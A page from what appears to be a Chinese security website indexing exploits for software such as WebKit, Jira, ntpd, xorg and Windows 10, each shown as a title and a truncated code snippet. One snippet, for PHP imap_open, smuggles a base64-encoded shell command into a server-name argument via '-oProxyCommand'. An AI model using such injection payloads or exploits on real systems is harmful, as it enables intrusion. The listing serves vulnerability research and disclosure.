首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
熱門關鍵字: shell  88888  art  vitter  linux
  當前位置:主頁>安全文章>文章資料>Exploits>列表
Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting
  日期:2018-11-16 16:34:14 點擊:35 評論:0
?php $filename=realpath(PoC.mht); header( Content-type: multipart/related); readfile($filename); ? MIME-Version: 1.0 Content-Type: multipart/related; type=text/html; boundary=----MultipartBoundary-- CVE-2017-5124 ------MultipartBoundary-- Content-Typ
Webkit (Safari) - Universal Cross-site Scripting
  日期:2018-11-16 16:33:33 點擊:21 評論:0
!-- # CVE-2017-7089 **Impact**: Processing maliciously crafted web content may lead to universal cross site scripting **Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management. #
PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass
  日期:2018-11-16 16:32:27 點擊:69 評論:0
?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'/tmp/test0001 $server = x -oProxyCommand=echotZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64t-d|sh}; imap_open('{'.$server.':143/imap}INBOX', '', '') or die(nnError:
Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)
  日期:2018-11-15 16:44:19 點擊:59 評論:0
# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc) # Discovery by: Daniel # Discovery Date: 2018-11-12 # Software Name: Bosch Video Management System # Software Version: 8.0 # Vendor Homepage: https://www.
SwitchVPN for macOS 2.1012.03 - Privilege Escalation
  日期:2018-11-15 16:43:21 點擊:129 評論:0
======================================================================= Title: Privilege Escalation Vulnerability Product: SwitchVPN for MacOS Vulnerable version: 2.1012.03 CVE ID: CVE-2018-18860 Impact: Critical Homepage: https://switchvpn.net/ Iden
Atlassian Jira Authenticated Upload Code Execution
  日期:2018-11-14 18:46:48 點擊:35 評論:0
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient includ
AMPPS 2.7 - Denial of Service (PoC)
  日期:2018-11-14 18:46:10 點擊:29 評論:0
# Exploit Title: AMPPS 2.7 - Denial of Service (PoC) # Dork: N/A # Date: 2018-11-12 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.ampps.com/ # Software Link: https://kent.dl.sourceforge.net/project/ampps/2.7/Ampps-2.7-setup.exe # Versi
ntpd 4.2.8p10 - Out-of-Bounds Read (PoC)
  日期:2018-11-14 18:44:53 點擊:37 評論:0
# Exploit Title: ntpd 4.2.8p10 - Out-of-Bounds Read (PoC) # Bug Discovery: Yihan Lian, a security researcher of Qihoo 360 GearTeam # Exploit Author: Magnus Klaaborg Stubman (@magnusstubman) # Website: https://dumpco.re/blog/cve-2018-7182 # Vendor Hom
xorg-x11-server < 1.20.1 - Local Privilege Escalation
  日期:2018-11-14 18:44:07 點擊:52 評論:0
# Exploit Title: xorg-x11-server 1.20.1 - Local Privilege Escalation (RHEL 7) # Date: 2018-11-07 # Exploit Author: @bolonobolo # Vendor Homepage: https://www.x.org/ # Version: 1.19.5 # Tested on: RHEL 7.3 7.5 # CVE : CVE-2018-14665 # Explanation # Th
Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service
  日期:2018-11-14 18:43:16 點擊:40 評論:0
/* [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec ***Greetz: indou
XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
  日期:2018-11-14 18:42:14 點擊:61 評論:0
# Exploit Title: XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode) # Exploit Author: Gionathan John Reale (0-day DoS exploit), Semen Alexandrovich Lyhin (1-day fully working exploit). # Shellcode Author: Giuseppe D'Amore (EDB:28996) # Date:
Evince 3.24.0 - Command Injection
  日期:2018-11-14 18:41:20 點擊:29 評論:0
# Exploit Title: evince command line injection # Date: 2017-09-05 # Exploit Author: Matlink # Vendor Homepage: https://wiki.gnome.org/Apps/Evince # Software Link: https://wiki.gnome.org/Apps/Evince # Version: 3.24.0 # Tested on: Debian sid # CVE : CV
CuteFTP Mac 3.1 - Denial of Service (PoC)
  日期:2018-11-14 18:40:05 點擊:23 評論:0
# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC) # Date: 2018-11-06 # Exploit Author: Yair Rodrguez Aparicio # Vendor Homepage: https://www.globalscape.com/cuteftp # Software Link: http://go.globalscape.com/download/cuteftp-macosx # Version:
Mongoose Web Server 6.9 - Denial of Service (PoC)
  日期:2018-11-14 18:39:07 點擊:79 評論:0
# Exploit Title: Mongoose Web Server 6.9 - Denial of Service (PoC) # Dork: N/A # Date: 2018-11-11 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://cesanta.com/binary.html # Software Link: https://backend.cesanta.com/cgi-bin/api.cgi?act=dlos=
CuteFTP 9.3.0.3 - Denial of Service (PoC)
  日期:2018-11-14 18:38:11 點擊:95 評論:0
# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC) # Date: 2018-11-05 # Exploit Author: Ismael Nava # Vendor Homepage: https://www.globalscape.com/cuteftp # Software Link: https://www.globalscape.com/cuteftp # Version: 9.3.0.3 # Tested on: Wi
TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configur
  日期:2018-11-14 18:37:06 點擊:42 評論:0
# Exploit Title: TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure) # Date: 2018-11-07 # Exploit Author: Wadeek # Vendor Homepage: https://www.tp-link.com/ # Hardware Version: Archer C50 v3 00000001
HeidiSQL 9.5.0.5196 - Denial of Service (PoC)
  日期:2018-11-14 18:36:17 點擊:16 評論:0
# Exploit Title: HeidiSQL 9.5.0.5196 - Denial of Service (PoC) # Discovery by: Victor Mondragn # Discovery Date: 2018-11-06 # Vendor Homepage: https://www.heidisql.com/ # Software Link: https://www.heidisql.com/download.php # Tested Version: 9.5.0.51
Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)
  日期:2018-11-14 18:35:21 點擊:39 評論:0
#include stdafx.h #include Windows.h #include resource.h void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) { HMODULE hMod = GetModuleHandle(NULL); HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName); DWORD dllSize =
VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC)
  日期:2018-11-07 14:46:48 點擊:29 評論:0
# Exploit Title: VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC) # Discovery by: Diego Santamaria # Discovery Date: 2018-11-05 # Vendor Homepage: https:https://www.visionistech.com/en/home/ # Software Link: https://www.vi
libiec61850 1.3 - Stack Based Buffer Overflow
  日期:2018-11-07 14:45:23 點擊:117 評論:0
Exploit Title: libiec61850 1.3 - Stack Based Buffer Overflow # Date: 2018-11-06 # Exploit Author: Dhiraj Mishra # Vendor Homepage: http://libiec61850.com/libiec61850/ # Software Link: https://github.com/mz-automation/libiec61850 # Version: 1.3 # Test
共636頁/12701條記錄 首頁 上一頁 [4] [5] [6] 7 [8] [9] [10] 下一頁 末頁
  本月熱點文章
·Microsoft Windows - 'SMBGhos
·vCloud Director 9.7.0.154982
·vCloud Director 9.7.0.154982
  本月推薦文章
 
  相關分類
  漏洞檢測
  漏洞資料
  入侵實例
  系統安全
  網絡安全
  網絡基礎
  病毒分析
Exploits
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved
35选7杀号技巧